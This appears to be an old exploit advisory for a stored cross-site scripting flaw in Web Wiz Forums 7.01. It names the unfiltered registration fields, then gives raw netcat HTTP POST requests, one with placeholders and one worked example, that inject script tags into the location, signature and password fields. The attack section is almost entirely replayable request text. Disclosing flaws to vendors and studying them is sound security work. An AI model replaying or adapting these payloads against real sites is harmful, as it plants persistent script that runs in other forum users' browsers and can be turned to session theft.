Informations : °°°°°°°°°°°° Language : ASP Bugged Version : Web Wiz Forums ver. 7.01 (and less ?) Website : http://www.webwizforums.com Problems : Permanent XSS Objects : °°°°°°° - register_new_user.asp - register.asp The values variable are not filtered: strLocation = Request.Form("location") strMessage = Request.Form("signature") strPassword = Request.Form("password") Exploits : °°°°°°°° >nc target 80 POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0 Host: hack.microsoft.com Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True Content-type: application/x-www-form-urlencoded Content-length: 290 Connection: keep-alive Posting 290 bytes... name=%5BHEX%5D password=">[CODE] password2=">[CODE] email=support%40microsoft.com emailShow=True location=">[CODE] homepage=http%3A%2F%2Fhex.net.ru Login=True ActiveUsers=False signature=">[CODE] countcharacters=28 Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF P.S. The value NAME should coincide with whose that by a nick from a forum !!! Example: °°°°°°°° >nc target 80 POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0 Host: hack.microsoft.com Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True Content-type: application/x-www-form-urlencoded Content-length: 290 Connection: keep-alive Posting 290 bytes... name=%5BHEX%5D password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E email=support%40microsoft.com emailShow=True location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E homepage=http%3A%2F%2Fhex.net.ru Login=True ActiveUsers=False signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E countcharacters=28 Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF Patch/More Details : °°°°°°°°°°°°°°°°°° There was no opportunity to check up it on the version 7.5 and 7.51 :( Waiting for the reply from technical support at http://www.webwizforums.com ... [ Local time 21:50 | Пpоклятая йцукен, и как с ней только люди живут... ] [ Copyright by [HEX] | mailto:hex@hex.net.ru ]
